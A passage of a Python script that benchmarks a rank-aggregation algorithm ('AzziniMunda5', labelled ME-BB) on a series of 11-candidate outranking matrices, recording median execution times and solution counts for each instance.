[34,20,0,26,32,31,32,31,26,34,28],
[34,23,25,0,24,37,21,21,23,26,27],
[35,22,19,27,0,36,21,24,25,28,29],
[31,16,20,14,15,0,14,20,17,26,18],
[37,19,19,30,30,37,0,28,25,31,25],
[41,28,20,30,27,31,23,0,29,30,26],
[31,21,25,28,26,34,26,22,0,37,32],
[36,19,17,25,23,25,20,21,14,0,22],
[39,25,23,24,22,33,26,25,19,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 44, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,17,24,35,9,27,23,13,29,39],
[23,0,17,12,20,21,26,20,22,25,34],
[34,34,0,30,49,31,24,31,31,29,39],
[27,39,21,0,47,30,29,25,17,32,30],
[16,31,2,4,0,14,10,10,7,27,24],
[42,30,20,21,37,0,35,35,20,29,44],
[24,25,27,22,41,16,0,30,19,30,31],
[28,31,20,26,41,16,21,0,18,29,22],
[38,29,20,34,44,31,32,33,0,21,34],
[22,26,22,19,24,22,21,22,30,0,28],
[12,17,12,21,27,7,20,29,17,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 45, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,39,13,50,27,24,39,38,36,15,51],
[12,0,12,36,26,24,38,12,24,14,36],
[38,39,0,50,27,24,39,38,36,27,51],
[1,15,1,0,15,12,27,26,12,15,39],
[24,25,24,36,0,24,24,12,36,27,36],
[27,27,27,39,27,0,27,26,25,15,39],
[12,13,12,24,27,24,0,12,24,15,25],
[13,39,13,25,39,25,39,0,25,15,25],
[15,27,15,39,15,26,27,26,0,15,39],
[36,37,24,36,24,36,36,36,36,0,36],
[0,15,0,12,15,12,26,26,12,15,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 46, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,25,30,32,30,31,26,31,33,24],
[25,0,24,33,23,28,23,20,19,25,24],
[26,27,0,25,26,25,23,22,20,31,26],
[21,18,26,0,28,22,23,19,19,23,24],
[19,28,25,23,0,22,26,28,22,29,28],
[21,23,26,29,29,0,21,24,16,27,17],
[20,28,28,28,25,30,0,25,22,31,22],
[25,31,29,32,23,27,26,0,17,32,28],
[20,32,31,32,29,35,29,34,0,36,30],
[18,26,20,28,22,24,20,19,15,0,22],
[27,27,25,27,23,34,29,23,21,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 47, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,23,28,20,21,26,24,26,24,23],
[28,0,26,25,19,26,26,29,31,26,30],
[28,25,0,27,22,22,27,24,29,26,27],
[23,26,24,0,19,21,30,23,25,23,23],
[31,32,29,32,0,23,30,29,28,25,33],
[30,25,29,30,28,0,27,27,31,26,30],
[25,25,24,21,21,24,0,19,29,20,23],
[27,22,27,28,22,24,32,0,27,24,26],
[25,20,22,26,23,20,22,24,0,21,23],
[27,25,25,28,26,25,31,27,30,0,26],
[28,21,24,28,18,21,28,25,28,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 48, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,19,17,18,18,22,15,16,23],
[24,0,35,30,26,21,24,23,18,26,29],
[19,16,0,26,16,13,15,21,14,16,19],
[32,21,25,0,23,27,25,27,27,24,25],
[34,25,35,28,0,26,29,29,24,23,27],
[33,30,38,24,25,0,29,24,24,23,17],
[33,27,36,26,22,22,0,23,26,29,33],
[29,28,30,24,22,27,28,0,19,24,26],
[36,33,37,24,27,27,25,32,0,31,28],
[35,25,35,27,28,28,22,27,20,0,22],
[28,22,32,26,24,34,18,25,23,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 49, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,18,31,14,23,23,20,23,29,14],
[20,0,15,15,17,22,33,21,18,18,6],
[33,36,0,25,25,35,32,32,31,36,27],
[20,36,26,0,16,26,28,19,25,25,18],
[37,34,26,35,0,34,26,22,36,30,20],
[28,29,16,25,17,0,23,19,20,16,17],
[28,18,19,23,25,28,0,20,24,27,12],
[31,30,19,32,29,32,31,0,34,26,13],
[28,33,20,26,15,31,27,17,0,24,15],
[22,33,15,26,21,35,24,25,27,0,18],
[37,45,24,33,31,34,39,38,36,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 50, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,23,31,23,20,27,23,30,19,26],
[31,0,21,32,30,26,24,22,40,28,33],
[28,30,0,27,26,29,23,23,35,27,29],
[20,19,24,0,18,15,19,22,34,25,17],
[28,21,25,33,0,20,20,21,31,25,22],
[31,25,22,36,31,0,27,29,40,23,27],
[24,27,28,32,31,24,0,25,34,28,25],
[28,29,28,29,30,22,26,0,28,26,25],
[21,11,16,17,20,11,17,23,0,14,19],
[32,23,24,26,26,28,23,25,37,0,26],
[25,18,22,34,29,24,26,26,32,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 51, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,23,25,22,23,24,24,20,21,22],
[25,0,23,24,22,25,26,21,22,21,24],
[28,28,0,24,22,20,23,25,22,16,26],
[26,27,27,0,17,27,29,31,24,27,28],
[29,29,29,34,0,23,28,26,25,26,33],
[28,26,31,24,28,0,29,28,28,25,32],
[27,25,28,22,23,22,0,22,18,23,29],
[27,30,26,20,25,23,29,0,20,26,33],
[31,29,29,27,26,23,33,31,0,24,32],
[30,30,35,24,25,26,28,25,27,0,32],
[29,27,25,23,18,19,22,18,19,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 52, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,24,26,30,23,26,27,22,22,18],
[21,0,16,16,17,13,18,19,18,17,20],
[27,35,0,24,32,21,28,26,29,19,26],
[25,35,27,0,35,20,22,25,23,22,27],
[21,34,19,16,0,22,22,23,22,16,21],
[28,38,30,31,29,0,26,27,24,22,26],
[25,33,23,29,29,25,0,21,20,24,19],
[24,32,25,26,28,24,30,0,20,24,17],
[29,33,22,28,29,27,31,31,0,18,23],
[29,34,32,29,35,29,27,27,33,0,18],
[33,31,25,24,30,25,32,34,28,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 53, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,31,24,42,11,32,29,32,41,25],
[15,0,13,32,23,9,28,25,22,36,29],
[20,38,0,28,36,30,29,35,31,41,33],
[27,19,23,0,25,17,26,31,27,37,24],
[9,28,15,26,0,3,15,18,11,30,24],
[40,42,21,34,48,0,27,33,37,44,31],
[19,23,22,25,36,24,0,33,32,39,26],
[22,26,16,20,33,18,18,0,20,33,16],
[19,29,20,24,40,14,19,31,0,34,18],
[10,15,10,14,21,7,12,18,17,0,14],
[26,22,18,27,27,20,25,35,33,37,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 54, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,24,30,24,26,23,28,26,27,27],
[24,0,26,31,29,23,26,32,24,27,29],
[27,25,0,29,29,29,25,34,24,22,27],
[21,20,22,0,24,24,16,24,21,24,21],
[27,22,22,27,0,24,22,26,25,28,23],
[25,28,22,27,27,0,20,30,25,25,28],
[28,25,26,35,29,31,0,29,27,29,27],
[23,19,17,27,25,21,22,0,23,24,29],
[25,27,27,30,26,26,24,28,0,29,27],
[24,24,29,27,23,26,22,27,22,0,23],
[24,22,24,30,28,23,24,22,24,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 55, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,22,27,24,22,36,26,28,25,29],
[19,0,15,25,26,22,32,22,31,23,26],
[29,36,0,34,24,21,37,38,34,33,31],
[24,26,17,0,23,23,30,24,25,23,31],
[27,25,27,28,0,28,29,25,31,27,27],
[29,29,30,28,23,0,39,29,31,26,25],
[15,19,14,21,22,12,0,16,24,22,20],
[25,29,13,27,26,22,35,0,26,24,29],
[23,20,17,26,20,20,27,25,0,24,24],
[26,28,18,28,24,25,29,27,27,0,24],
[22,25,20,20,24,26,31,22,27,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 56, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,22,21,32,25,31,26,25,29,27],
[24,0,27,24,30,25,31,27,27,26,24],
[29,24,0,25,38,31,32,22,25,25,27],
[30,27,26,0,33,24,25,28,26,22,22],
[19,21,13,18,0,22,25,16,15,23,14],
[26,26,20,27,29,0,23,20,24,22,20],
[20,20,19,26,26,28,0,21,25,26,19],
[25,24,29,23,35,31,30,0,30,28,24],
[26,24,26,25,36,27,26,21,0,26,20],
[22,25,26,29,28,29,25,23,25,0,25],
[24,27,24,29,37,31,32,27,31,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 57, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,24,41,41,41,24,31,24,24,27],
[27,0,34,24,27,24,24,7,31,51,3],
[27,17,0,24,27,24,17,7,31,51,3],
[10,27,27,0,44,41,27,34,27,27,27],
[10,24,24,7,0,41,24,31,24,27,3],
[10,27,27,10,10,0,3,34,27,34,3],
[27,27,34,24,27,48,0,34,31,34,3],
[20,44,44,17,20,17,17,0,41,44,20],
[27,20,20,24,27,24,20,10,0,27,3],
[27,0,0,24,24,17,17,7,24,0,3],
[24,48,48,24,48,48,48,31,48,48,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 58, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,22,9,13,25,10,23,14,20,33],
[34,0,34,16,22,26,29,34,29,35,28],
[29,17,0,11,12,18,10,42,19,18,29],
[42,35,40,0,30,30,22,31,27,31,42],
[38,29,39,21,0,29,21,32,26,24,32],
[26,25,33,21,22,0,20,31,25,26,31],
[41,22,41,29,30,31,0,41,24,36,43],
[28,17,9,20,19,20,10,0,13,17,29],
[37,22,32,24,25,26,27,38,0,26,31],
[31,16,33,20,27,25,15,34,25,0,31],
[18,23,22,9,19,20,8,22,20,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 59, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,31,30,34,28,16,23,28,21,23],
[20,0,29,27,18,27,25,35,26,20,25],
[20,22,0,28,30,28,22,32,23,22,19],
[21,24,23,0,25,22,20,26,26,23,25],
[17,33,21,26,0,23,16,27,23,14,21],
[23,24,23,29,28,0,31,28,26,25,29],
[35,26,29,31,35,20,0,29,24,15,31],
[28,16,19,25,24,23,22,0,28,22,30],
[23,25,28,25,28,25,27,23,0,27,29],
[30,31,29,28,37,26,36,29,24,0,36],
[28,26,32,26,30,22,20,21,22,15,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 60, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,20,14,40,36,25,20,28,22,17],
[34,0,23,30,40,32,26,39,26,22,33],
[31,28,0,33,37,35,29,32,29,25,30],
[37,21,18,0,39,27,24,32,22,23,23],
[11,11,14,12,0,23,5,15,14,8,10],
[15,19,16,24,28,0,20,19,13,3,14],
[26,25,22,27,46,31,0,32,26,12,17],
[31,12,19,19,36,32,19,0,26,27,21],
[23,25,22,29,37,38,25,25,0,15,25],
[29,29,26,28,43,48,39,24,36,0,31],
[34,18,21,28,41,37,34,30,26,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 61, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,27,22,26,17,26,27,22,21,16],
[26,0,27,25,26,24,32,34,24,30,25],
[24,24,0,25,29,27,32,33,28,28,28],
[29,26,26,0,27,22,26,28,24,23,28],
[25,25,22,24,0,24,27,31,21,19,26],
[34,27,24,29,27,0,26,32,28,25,30],
[25,19,19,25,24,25,0,30,27,23,23],
[24,17,18,23,20,19,21,0,24,19,23],
[29,27,23,27,30,23,24,27,0,28,19],
[30,21,23,28,32,26,28,32,23,0,24],
[35,26,23,23,25,21,28,28,32,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 62, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,48,22,41,33,25,51,48,51,48],
[15,0,26,15,26,26,40,18,37,29,41],
[3,25,0,15,15,29,25,18,37,44,26],
[29,36,36,0,41,14,36,29,48,36,41],
[10,25,36,10,0,21,25,25,40,36,51],
[18,25,22,37,30,0,40,40,37,51,41],
[26,11,26,15,26,11,0,26,48,29,41],
[0,33,33,22,26,11,25,0,37,51,41],
[3,14,14,3,11,14,3,14,0,14,14],
[0,22,7,15,15,0,22,0,37,0,15],
[3,10,25,10,0,10,10,10,37,36,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 63, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,23,29,24,22,22,29,30,26,24],
[25,0,21,29,30,27,24,31,31,31,31],
[28,30,0,26,20,17,28,34,26,30,25],
[22,22,25,0,19,19,24,25,25,24,24],
[27,21,31,32,0,29,23,28,26,28,31],
[29,24,34,32,22,0,27,30,30,30,32],
[29,27,23,27,28,24,0,30,28,29,28],
[22,20,17,26,23,21,21,0,35,31,27],
[21,20,25,26,25,21,23,16,0,25,25],
[25,20,21,27,23,21,22,20,26,0,22],
[27,20,26,27,20,19,23,24,26,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 64, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,33,37,28,32,33,25,34,28,35,27],
[18,0,36,30,27,32,15,21,17,27,22],
[14,15,0,19,29,24,14,24,21,24,17],
[23,21,32,0,24,28,17,30,20,33,22],
[19,24,22,27,0,26,25,28,28,25,20],
[18,19,27,23,25,0,14,22,13,29,12],
[26,36,37,34,26,37,0,28,24,27,23],
[17,30,27,21,23,29,23,0,19,26,19],
[23,34,30,31,23,38,27,32,0,34,24],
[16,24,27,18,26,22,24,25,17,0,26],
[24,29,34,29,31,39,28,32,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 65, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,11,23,19,10,21,21,21,23,22],
[32,0,28,29,25,23,23,19,22,24,27],
[40,23,0,32,31,26,27,29,23,25,28],
[28,22,19,0,18,18,20,23,16,24,23],
[32,26,20,33,0,17,21,25,21,22,27],
[41,28,25,33,34,0,38,35,23,26,29],
[30,28,24,31,30,13,0,24,23,20,25],
[30,32,22,28,26,16,27,0,23,23,23],
[30,29,28,35,30,28,28,28,0,25,27],
[28,27,26,27,29,25,31,28,26,0,25],
[29,24,23,28,24,22,26,28,24,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 66, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,31,29,18,28,33,25,19,15,32],
[23,0,23,25,14,25,30,20,8,18,27],
[20,28,0,27,20,28,29,24,17,17,25],
[22,26,24,0,14,23,25,25,15,14,31],
[33,37,31,37,0,40,38,31,31,24,39],
[23,26,23,28,11,0,21,20,22,19,18],
[18,21,22,26,13,30,0,13,13,20,31],
[26,31,27,26,20,31,38,0,19,19,33],
[32,43,34,36,20,29,38,32,0,30,38],
[36,33,34,37,27,32,31,32,21,0,40],
[19,24,26,20,12,33,20,18,13,11,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 67, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,10,0,0,0,31,21,39,10,10,21],
[41,0,29,33,29,39,21,39,31,31,29],
[51,22,0,12,20,39,31,51,22,22,33],
[51,18,39,0,8,39,39,39,10,10,29],
[51,22,31,43,0,39,31,51,31,43,21],
[20,12,12,12,12,0,21,30,22,22,33],
[30,30,20,12,20,30,0,30,22,22,41],
[12,12,0,12,0,21,21,0,10,10,21],
[41,20,29,41,20,29,29,41,0,51,29],
[41,20,29,41,8,29,29,41,0,0,29],
[30,22,18,22,30,18,10,30,22,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 68, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,24,16,21,26,21,21,25,17,18],
[25,0,23,20,24,25,24,20,24,16,20],
[27,28,0,22,25,28,21,23,27,18,20],
[35,31,29,0,27,32,28,29,31,25,30],
[30,27,26,24,0,30,22,25,26,20,25],
[25,26,23,19,21,0,18,18,26,17,21],
[30,27,30,23,29,33,0,25,29,26,23],
[30,31,28,22,26,33,26,0,31,19,23],
[26,27,24,20,25,25,22,20,0,15,23],
[34,35,33,26,31,34,25,32,36,0,29],
[33,31,31,21,26,30,28,28,28,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 69, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,35,28,31,25,28,23,21,27,35,32],
[16,0,26,27,29,29,21,28,24,36,32],
[23,25,0,24,28,27,26,22,22,30,30],
[20,24,27,0,28,22,22,22,19,30,33],
[26,22,23,23,0,23,25,27,26,31,31],
[23,22,24,29,28,0,24,32,23,33,30],
[28,30,25,29,26,27,0,35,30,33,31],
[30,23,29,29,24,19,16,0,24,29,34],
[24,27,29,32,25,28,21,27,0,28,35],
[16,15,21,21,20,18,18,22,23,0,28],
[19,19,21,18,20,21,20,17,16,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 70, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,21,26,31,20,24,29,18,34,30],
[15,0,21,16,19,9,17,24,13,24,23],
[30,30,0,24,33,17,30,29,29,28,33],
[25,35,27,0,32,29,23,31,26,27,35],
[20,32,18,19,0,22,15,19,14,22,31],
[31,42,34,22,29,0,31,23,24,26,40],
[27,34,21,28,36,20,0,37,27,27,27],
[22,27,22,20,32,28,14,0,20,21,27],
[33,38,22,25,37,27,24,31,0,31,38],
[17,27,23,24,29,25,24,30,20,0,29],
[21,28,18,16,20,11,24,24,13,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 71, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,27,19,26,22,20,21,25,17,28],
[32,0,35,33,41,23,34,26,34,30,37],
[24,16,0,23,23,8,23,13,17,14,24],
[32,18,28,0,31,19,32,21,24,18,28],
[25,10,28,20,0,17,21,21,23,22,32],
[29,28,43,32,34,0,28,32,24,30,38],
[31,17,28,19,30,23,0,22,20,18,30],
[30,25,38,30,30,19,29,0,23,17,36],
[26,17,34,27,28,27,31,28,0,23,32],
[34,21,37,33,29,21,33,34,28,0,32],
[23,14,27,23,19,13,21,15,19,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 72, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,33,38,26,23,29,33,27,23,30],
[24,0,29,31,24,22,22,27,24,25,34],
[18,22,0,29,22,21,26,26,23,18,28],
[13,20,22,0,22,13,14,24,12,15,18],
[25,27,29,29,0,22,24,27,22,26,32],
[28,29,30,38,29,0,31,30,24,22,32],
[22,29,25,37,27,20,0,27,24,19,28],
[18,24,25,27,24,21,24,0,23,27,28],
[24,27,28,39,29,27,27,28,0,24,28],
[28,26,33,36,25,29,32,24,27,0,33],
[21,17,23,33,19,19,23,23,23,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 73, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,25,26,22,27,29,27,24,31,26],
[28,0,32,25,31,28,33,29,29,31,31],
[26,19,0,25,25,23,31,29,24,31,27],
[25,26,26,0,26,24,25,29,25,33,24],
[29,20,26,25,0,30,28,30,28,33,28],
[24,23,28,27,21,0,23,26,25,31,24],
[22,18,20,26,23,28,0,25,26,31,28],
[24,22,22,22,21,25,26,0,20,23,25],
[27,22,27,26,23,26,25,31,0,28,24],
[20,20,20,18,18,20,20,28,23,0,23],
[25,20,24,27,23,27,23,26,27,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 74, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,37,34,27,26,32,32,30,26],
